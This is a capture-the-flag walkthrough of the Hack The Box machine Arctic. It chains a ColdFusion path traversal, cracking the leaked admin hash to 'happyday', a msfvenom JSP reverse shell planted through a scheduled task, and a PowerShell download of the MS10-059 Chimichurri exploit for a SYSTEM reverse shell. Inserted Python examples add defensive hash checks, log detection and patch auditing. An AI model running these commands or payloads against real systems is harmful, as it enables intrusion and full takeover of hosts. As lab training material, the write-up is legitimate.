HTB – Arctic Walkthrough

nmap

Nmap scan report for 10.10.10.11
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 8500 – ColdFusion

http://10.10.10.11:8500/ shows a bare directory listing:

Index of /
CFIDE/    dir   03/22/17 08:52
cfdocs/   dir   03/22/17 08:55

ColdFusion File Inclusion

https://www.exploit-db.com/exploits/14641

The traversal from exploit-db 14641 returns the ColdFusion password.properties file, which holds the administrator password as a hash (the O in the OCR'd hash is a zero):

#Wed Mar 22 EET 2017
rdspassword=(not legible in the screenshot)
password=2F635F6D20E3FDE0C53075A84868F807DCEC9803
encrypted=true

Hash Crack

root@kali:/home/kalisa/HTB/arctic# hash-identifier   (v1.1, by Zion3R, www.blackploit.com)
 HASH: 2F635F6D20E3FDE0C53075A84868F807DCEC9803

Possible Hashs:
[+]  SHA-1
[+]  MySQL5 - SHA-1(SHA-1($pass))

The hash is submitted to https://hashkiller.co.uk/Cracker:

Cracker Results: We cracked 1 hashes leaving 0 left.
SHA1  happyday
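
The file above is a Java properties file and the digest is an unsalted SHA-1, which is why an online lookup cracks it instantly. As an added example (not part of the walkthrough), the following Python parses the file, classifies the digest by length the way hash-identifier does, and checks candidate passwords offline. The sample file content is constructed from the fields in the screenshot; the digest is the page's value with the OCR letter O read as zero.

```python
"""Added example (not from the walkthrough): parse a ColdFusion-style
password.properties file and test candidate passwords against the stored
unsalted SHA-1 digest offline.

Assumptions (not stated on the page): the sample content below is
constructed to mirror the fields in the screenshot; the digest is the one
read off the page with the OCR's letter O corrected to zero."""
import hashlib
import re

# Constructed sample: same keys as the screenshot, values as read off the page.
SAMPLE_PROPERTIES = """\
#Wed Mar 22 EET 2017
rdspassword=<not legible in the screenshot>
password=2F635F6D20E3FDE0C53075A84868F807DCEC9803
encrypted=true
"""


def parse_properties(text):
    """Parse Java .properties text into a dict; comments and blanks are skipped.
    Only the plain key=value form is handled, which is all this file uses."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def classify_digest(hex_digest):
    """Guess the hash family from the hex length alone, as hash-identifier does.
    A 40-hex-char digest is SHA-1 sized but could equally be MySQL5's
    SHA-1(SHA-1($pass)), which is why the tool lists both candidates."""
    if not re.fullmatch(r"[0-9A-Fa-f]+", hex_digest):
        return "not a hex digest"
    return {32: "MD5-sized (128-bit)", 40: "SHA-1-sized (160-bit)",
            64: "SHA-256-sized (256-bit)"}.get(len(hex_digest), "unknown length")


def check_candidate(candidate, props):
    """True if the candidate matches the stored 'password' value.
    ColdFusion 8 stores the administrator password as unsalted uppercase SHA-1
    hex when encrypted=true, so one hashlib call is the whole test; the lack of
    a salt and of any work factor is what makes the offline crack cheap."""
    if props.get("encrypted", "false").lower() != "true":
        return candidate == props.get("password")          # plaintext storage
    digest = hashlib.sha1(candidate.encode("utf-8")).hexdigest().upper()
    return digest == props.get("password", "").upper()


def first_match(candidates, props):
    """Try a small candidate list; return the first match or None."""
    for word in candidates:
        if check_candidate(word, props):
            return word
    return None


if __name__ == "__main__":
    props = parse_properties(SAMPLE_PROPERTIES)
    print(props["password"], "->", classify_digest(props["password"]))
    # The walkthrough reports that this digest cracks to 'happyday'.
    print("happyday matches:", check_candidate("happyday", props))
```

The defensive takeaway is in `check_candidate`: anything an attacker can read from disk that verifies with a single unsalted hash call is effectively a password in the clear, and the fix is restricting read access to the file rather than hoping the digest holds up.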

JSP Shell Creation & File Upload & Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=8888 -f raw > shell.jsp
Payload size: 1497 bytes
Log in to the ColdFusion Administrator at http://10.10.10.11:8500/CFIDE/administrator/index.cfm with the cracked password, then go to Debugging & Logging > Scheduled Tasks > Add/Edit Scheduled Task and create a task that fetches the shell from the attacker's web server and saves the response under the webroot:

Task Name:   shell
Start Date:  21 May 2019
Frequency:   One-time
URL:         http://10.10.14.10:8000/shell.jsp
Publish:     Save output to a file (checked)
File:        C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Submit the form to save the task.

Run the task and open the file on the following directory

C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Debugging & Logging > Scheduled Tasks
Task Name   Duration      Interval
shell       21 May 2019   One-time at 1:45

Running the task writes shell.jsp; requesting http://10.10.10.11:8500/CFIDE/shell.jsp in the browser executes it and the listener receives the connection:

nc -nlvp 8888
listening on [any] 8888
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49419
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
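
Every step of this chain leaves a line in the web server's access log: the traversal that read password.properties, the administrator console being used from a non-local address, and a .jsp being served from /CFIDE/, a directory that only contains ColdFusion's own .cfm pages. As an added example (not part of the walkthrough), the Python below runs those three checks over constructed common-log-format lines; the addresses are the ones the page uses, the request lines and timestamps are made up, and the allowlist of addresses permitted to reach the administrator is a parameter.

```python
"""Added example (not part of the walkthrough): scan web-server access logs
for the ColdFusion activity this section relies on, from the defender's side.

Assumptions (not on the page): the log lines are constructed in common log
format; the allowlist of addresses permitted to use the administrator console
is supplied by the caller."""
import re
from urllib.parse import unquote

# Constructed sample access log. Addresses are the walkthrough's; request
# lines are constructed so that each rule fires at least once.
SAMPLE_LOG = """\
10.10.14.10 - - [21/May/2019:01:30:02 +0300] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2F..%2Flib%2Fpassword.properties HTTP/1.1" 200 1337
10.10.14.10 - - [21/May/2019:01:31:15 +0300] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 302 0
10.10.14.10 - - [21/May/2019:01:45:30 +0300] "GET /CFIDE/shell.jsp HTTP/1.1" 200 0
10.10.10.11 - - [21/May/2019:08:00:00 +0300] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4000
203.0.113.7 - - [21/May/2019:09:00:00 +0300] "GET /cfdocs/index.htm HTTP/1.1" 200 2000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def parse_line(line):
    """One common-log-format line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_path(path):
    """Percent-decode twice so a double-encoded traversal (%252e%252e%2f) is
    seen the way the application sees it after its own decode."""
    for _ in range(2):
        path = unquote(path)
    return path


def assess(entry, admin_allowlist):
    """Return the list of findings for one parsed request (empty if benign)."""
    findings = []
    decoded = decode_path(entry["path"])
    url_only = decoded.split("?", 1)[0].lower()
    if TRAVERSAL_RE.search(decoded) or "password.properties" in decoded.lower():
        findings.append("path traversal toward password.properties (exploit-db 14641 pattern)")
    if url_only.startswith("/cfide/") and url_only.endswith(".jsp"):
        findings.append("JSP served from under /CFIDE/, which holds only ColdFusion's .cfm pages")
    if url_only.startswith("/cfide/administrator/") and entry["ip"] not in admin_allowlist:
        findings.append("administrator console reached from a non-allowlisted address")
    return findings


def scan(log_text, admin_allowlist=("127.0.0.1", "::1")):
    """Return one alert dict per log line that produced at least one finding."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = assess(entry, admin_allowlist)
        if findings:
            alerts.append({"ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
                           "path": entry["path"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG, admin_allowlist=("10.10.10.11",)):
        print(a["ip"], a["status"], a["path"])
        for f in a["findings"]:
            print("   -", f)
```

The status code is carried in each alert on purpose: a traversal that returned 200 with a non-trivial size is a confirmed read, whereas the same request answered with 404 is an attempt, and the two deserve different response priorities.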

Privilege escalation

systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017 (time not legible)
System Boot Time:          21/5/2019 (time not legible)
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2594 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2594 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 208 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.156 MB
Virtual Memory: In Use:    892 MB
Page File Location(s):     C:\pagefile.sys
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection

(System Directory, Boot Device and Domain are not legible in the screenshot. The box is an unpatched Server 2008 R2 build 7600 with no hotfixes listed.)

Python exploit suggester

The systeminfo output is saved to a file on Kali and fed to windows-exploit-suggester, which first downloads the current Microsoft security bulletin spreadsheet:

python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2019-05-19-mssb.xls
[*] done

python windows-exploit-suggester.py --database 2019-05-19-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
    http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
    http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

(The [E]/[M] marker in front of each bulletin did not survive the screenshot. Because no hotfixes are installed, every bulletin for the build is reported; the local privilege escalation chosen below is MS10-059.)
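
What the suggester does with the two inputs above is mechanical: read the OS version and the hotfix list out of systeminfo, then keep every bulletin for that build whose KB is not installed. As an added example (not the walkthrough's and not the tool's own code), the Python below re-creates that comparison as a patch-level audit that a defender can run against their own systeminfo captures. The systeminfo text is a constructed sample with the values legible in the screenshot; the bulletin table is built from the ids, KB numbers, severities and titles the tool printed, and its last field (the kernel versions each bulletin applies to) is hypothetical.

```python
"""Added example (not from the walkthrough, and not windows-exploit-suggester's
code): parse `systeminfo` output, extract kernel version, architecture and
installed hotfixes, and list bulletins whose KB is absent.

Assumptions (not on the page): the systeminfo text is a constructed sample
using the values legible in the screenshot; the bulletin table uses the ids,
KB numbers, severities and titles the suggester printed, and its last field
(kernel versions each bulletin applies to) is hypothetical."""
import re

HOTFIX_NONE = "Hotfix(s):                 N/A"
HOTFIX_ONE = ("Hotfix(s):                 1 Hotfix(s) Installed.\n"
              "                           [01]: KB982799")

# Constructed sample: the fields legible in the walkthrough's screenshot.
SAMPLE_SYSTEMINFO = f"""\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Configuration:          Standalone Server
System Type:               x64-based PC
{HOTFIX_NONE}
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""
# Constructed variant: the same host after the MS10-059 update (hypothetical).
SAMPLE_SYSTEMINFO_PATCHED = SAMPLE_SYSTEMINFO.replace(HOTFIX_NONE, HOTFIX_ONE)

# (bulletin id, KB, severity, title, kernel versions it applies to [hypothetical])
BULLETINS = [
    ("MS13-005", "2778930", "Important",
     "Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege", ("6.0", "6.1", "6.2")),
    ("MS11-011", "2393802", "Important",
     "Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege", ("5.1", "5.2", "6.0", "6.1")),
    ("MS10-073", "981957", "Important",
     "Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege", ("5.1", "5.2", "6.0", "6.1")),
    ("MS10-061", "2347290", "Critical",
     "Vulnerability in Print Spooler Service Could Allow Remote Code Execution", ("5.1", "5.2", "6.0", "6.1")),
    ("MS10-059", "982799", "Important",
     "Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege", ("6.0", "6.1")),
    ("MS10-047", "981852", "Important",
     "Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege", ("5.1", "5.2", "6.0", "6.1")),
]


def parse_systeminfo(text):
    """Return {field: value} for 'Key: value' lines plus a 'hotfixes' list.
    Indented continuation lines (NIC and hotfix entries) are appended to the
    preceding field, so multi-line values survive."""
    info, last = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace() and last is not None:
            info[last] += "\n" + raw.strip()
            continue
        key, sep, value = raw.partition(":")
        if not sep:
            continue
        last = key.strip()
        info[last] = value.strip()
    hot = info.get("Hotfix(s)", "")
    info["hotfixes"] = sorted({h.upper() for h in re.findall(r"KB\d{6,7}", hot, re.I)})
    return info


def kernel_version(info):
    """('6.1', 7600) from 'OS Version: 6.1.7600 N/A Build 7600'."""
    m = re.match(r"(\d+\.\d+)\.(\d+)", info.get("OS Version", ""))
    return (m.group(1), int(m.group(2))) if m else (None, None)


def is_64bit(info):
    return "x64" in info.get("System Type", "")


def audit(info, bulletins=BULLETINS):
    """Bulletins that apply to this kernel version and whose KB is absent.
    Absence is a lead, not proof: later rollups supersede older KBs without
    listing them, so confirm each hit against the build's servicing history."""
    major, _build = kernel_version(info)
    installed = set(info.get("hotfixes", []))
    return [b for b in bulletins if major in b[4] and "KB" + b[1] not in installed]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["Host Name"], kernel_version(info), "x64" if is_64bit(info) else "x86")
    for bid, kb, sev, title, _ in audit(info):
        print(f"  {bid} (KB{kb}) {sev}: {title}")
```

The supersedence caveat in `audit` is the reason the real tool reports 197 candidates for this host: with an empty hotfix list it cannot tell a missing patch from one folded into a later rollup, and on a host that is patched at all the list needs manual pruning before it means anything.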

Upload ms10-059.exe (Chimichurri) via PowerShell

On the target, a small download script is written one line at a time with echo and then run with the execution policy bypassed (the fifth echo line is only partly legible in the screenshot; $webclient.DownloadFile($url,$file) is the standard WebClient call that completes it):

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.10:8000/ms10-059.exe" >>wget.ps1
echo $file = "ms10-059.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5
 (directory path not legible in the screenshot; listing abridged)
18/03/2008  12:11            64.512 wsconfig.exe
22/03/2017  09:53             1.013 wsconfig_jvm.config
18/03/2008  12:11            64.512 wsdl2java.exe
18/03/2008  12:11            64.512 xmlscript.exe
              17 File(s)      3.339.263 bytes
               2 Dir(s)  33.180.127.232 bytes free

On Kali, the files are served from the working directory with Python's built-in HTTP server; its log shows the target fetching shell.jsp (twice) and then ms10-059.exe:

root@kali:/home/kalisa/HTB/arctic# ls
coldfusion-login  coldfusion.py  hash  msf.exe  nmap.gnmap  nmap.nmap  nmap.xml  powershell  shell.jsp
root@kali:/home/kalisa/HTB/arctic# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.11 - - [19/May/2019 10:40:48] "GET /shell.jsp HTTP/1.1" 200 -
10.10.10.11 - - [19/May/2019 (time not legible)] "GET /shell.jsp HTTP/1.1" 200 -
10.10.10.11 - - [19/May/2019 (time not legible)] "GET /ms10-059.exe HTTP/1.1" 200 -

Get an admin shell with exe file

After the download the listing shows the two uploaded files alongside ColdFusion's own (jikes.exe, jrun.exe, jrunsvc.exe, jrunsvcmsg.dll, jspc.exe, jvm.config, migrate.exe, portscan.dll, sniffer.exe, WindowsLogin.dll, wsconfig.exe, wsconfig_jvm.config, wsdl2java.exe, xmlscript.exe); the directory path is not legible in the screenshot:

dir
 (listing abridged)
21/05/2019  01:50           784.384 ms10-059.exe
21/05/2019  01:52                   wget.ps1
              18 File(s)      4.123.684 bytes
               2 Dir(s)  33.182.519.296 bytes free

Run the exploit with the attacker's address and a listener port as arguments:

ms10-059.exe 10.10.14.10 6666
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...

nc -nlvp 6666
listening on [any] 6666
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49535
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

whoami
nt authority\system

